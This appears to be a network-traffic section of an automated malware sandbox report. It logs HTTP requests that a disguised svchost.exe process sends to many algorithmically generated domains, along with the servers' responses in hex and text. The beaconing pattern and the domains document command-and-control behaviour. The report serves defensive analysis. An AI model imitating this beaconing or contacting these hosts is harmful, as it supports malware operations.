                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gahyqah.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.912132978 CET303INHTTP/1.1 302 Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:08 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                              X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                              Server: namecheap-nginx
                                                                                                                                                                                                              Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                              Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              1192.168.2.8497083.94.10.34807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.365611076 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lymyxid.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.793668985 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:08 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              2192.168.2.849709199.191.50.83807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.366271973 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: galyqaz.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653331041 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:08 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                              Set-Cookie: vsid=903vr478891988923922560; expires=Sat, 10-Nov-2029 17:33:08 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly
                                                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Data Raw: 61 38 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69
                                                                                                                                                                                                              Data Ascii: a8ae<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <scri
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653353930 CET94INData Raw: 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 21 22 67 64 70 72 41 70 70 6c 69
                                                                                                                                                                                                              Data Ascii: pt>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally"
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653366089 CET1236INData Raw: 69 6e 20 77 69 6e 64 6f 77 29 7b 77 69 6e 64 6f 77 2e 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64
                                                                                                                                                                                                              Data Ascii: in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){wi
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653460979 CET1236INData Raw: 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 7d 76 61 72 20 67 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73 75 70 70 6f 72 74 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68
                                                                                                                                                                                                              Data Ascii: getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653472900 CET1236INData Raw: 6f 3d 22 65 6e 22 3b 62 72 65 61 6b 7d 7d 7d 62 3d 22 5f 22 2b 6f 7d 66 75 6e 63 74 69 6f 6e 20 78 28 69 2c 65 29 7b 76 61 72 20 77 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69
                                                                                                                                                                                                              Data Ascii: o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653485060 CET1236INData Raw: 63 72 69 70 74 22 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 69 66 28 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63
                                                                                                                                                                                                              Data Ascii: cript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653496027 CET848INData Raw: 72 61 62 6c 6f 63 6b 69 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 3e 30 29 7b 61 2e 73 72 63 3d 22 2f 2f 22 2b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 6e 2b 22 2f 64 65 6c
                                                                                                                                                                                                              Data Ascii: rablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","-1");document.b
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653508902 CET1236INData Raw: 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 2c 63 6d 70 4c 6f 61 64 65 64 3a 66 61 6c 73 65 2c 63 6d 70 53 74 61 74 75 73 3a 22 73 74 75 62 22 2c 64 69 73 70 6c 61 79 53 74 61 74 75 73 3a 22 68 69 64 64 65 6e 22 2c 61 70 69 56 65 72
                                                                                                                                                                                                              Data Ascii: gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{a[2](false,true)}}else{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__c
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653520107 CET1236INData Raw: 31 29 3b 68 3d 74 72 75 65 3b 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 7b 65 76 65 6e 74 4e 61 6d 65 3a 22 6c 69 73 74 65 6e 65 72 52 65 6d 6f 76 65 64 22 2c 6c 69 73 74 65 6e 65 72 49 64 3a 65 2c 64 61 74 61 3a 68 2c 70 69 6e 67 44 61 74 61 3a 77
                                                                                                                                                                                                              Data Ascii: 1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_ping()}}else{if(g==="getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653532982 CET1236INData Raw: 63 21 3d 3d 6e 75 6c 6c 26 26 22 5f 5f 67 70 70 43 61 6c 6c 22 20 69 6e 20 63 29 7b 76 61 72 20 62 3d 63 2e 5f 5f 67 70 70 43 61 6c 6c 3b 77 69 6e 64 6f 77 2e 5f 5f 67 70 70 28 62 2e 63 6f 6d 6d 61 6e 64 2c 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29
                                                                                                                                                                                                              Data Ascii: c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.658366919 CET1236INData Raw: 63 66 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 74 63 66 61 70 69 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64
                                                                                                                                                                                                              Data Ascii: cf" in window)||!window.cmp_disabletcf){window.cmp_setStub("__tcfapi")}if(!("cmp_disableusp" in window)||!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              3192.168.2.849710208.100.26.245807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.366569042 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.813263893 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:08 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.814102888 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.918771029 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:08 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.986737013 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.095405102 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:34 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.110724926 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.214591026 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:34 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              4192.168.2.849712188.114.96.3807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.373912096 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.085290909 CET972INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XRA%2BgwhV4F9Fqc5ZuflR2qwFfQfMEb5vTKOiXtFSBjHHN%2Fwc8mQhHJZaszUf4DRyNNd60Dcygth7xNTb7B%2BEXSIpckFgo%2BvzGv8vxQJ0b3uveMFVILX9YL%2B48mEIVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006919e70c468-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1237&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.826864958 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.171658993 CET801INHTTP/1.1 301 Moved Permanently
